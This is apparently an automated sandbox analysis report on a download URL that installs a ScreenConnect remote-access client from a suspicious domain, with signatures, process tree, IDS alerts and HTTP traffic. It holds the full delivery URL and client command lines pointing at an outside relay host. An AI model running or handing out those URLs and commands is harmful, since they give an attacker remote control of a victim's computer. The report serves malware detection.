Windows Analysis Report
https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPq

Overview

General Information

Sample URL:https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2
Analysis ID:1544862

Detection

ScreenConnect Tool
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

.NET source code references suspicious native API functions
AI detected suspicious URL
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • support.Client.exe (PID: 7640 cmdline: "C:\Users\user\Downloads\support.Client.exe" MD5: 7B959C1EA179AF2DFC447BF8DB1E2C26)
      • dfsvc.exe (PID: 7692 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
        • ScreenConnect.WindowsClient.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" MD5: 5DEC65C4047DE914C78816B8663E3602)
          • ScreenConnect.ClientService.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1" MD5: DC615E9D8EC81CBF2E2452516373E5A0)
  • chrome.exe (PID: 6616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5860 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 1828 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 2996 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4884 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8128 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7296 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 72 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1" MD5: DC615E9D8EC81CBF2E2452516373E5A0)
    • ScreenConnect.WindowsClient.exe (PID: 1388 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User" MD5: 5DEC65C4047DE914C78816B8663E3602)
    • ScreenConnect.WindowsClient.exe (PID: 6676 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System" MD5: 5DEC65C4047DE914C78816B8663E3602)
  • rundll32.exe (PID: 3252 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7692 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7256 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.ClientService.exe PID: 2212 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
              Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49715, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7692, Protocol: tcp, SourceIp: 37.221.67.19, SourceIsIpv6: false, SourcePort: 443
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6648, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T19:34:42.936256+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49721 | TCP
2024-10-29T19:34:44.872378+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49722 | TCP
2024-10-29T19:34:50.305537+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49726 | TCP
2024-10-29T19:34:52.144780+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49727 | TCP
2024-10-29T19:34:56.496926+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49729 | TCP
2024-10-29T19:35:01.682027+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49730 | TCP
2024-10-29T19:35:04.113926+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49731 | TCP
2024-10-29T19:35:06.118919+0100 | 2009897 | 1 | A Network Trojan was detected | 37.221.67.19 | 443 | 192.168.2.16 | 49733 | TCP

              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb source: support.Client.exe, 0000000D.00000000.1408916929.000000000025B000.00000002.00000001.01000000.00000006.sdmp, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A346A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll0.14.dr, ScreenConnect.ClientService.dll.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000012.00000000.1939664334.00000000007FD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.ClientService.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll.14.dr, ScreenConnect.Windows.dll0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior

              Networking

              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeRegistry value created: NULL Service
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49721
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49729
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49722
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49727
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49726
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49731
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49730
              Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 37.221.67.19:443 -> 192.168.2.16:49733
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
              Source: global trafficHTTP traffic detected: GET /Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= HTTP/1.1Host: cp9856.chelokipotlester.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzipConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cp9856.chelokipotlester.icuAccept-Encoding: gzip
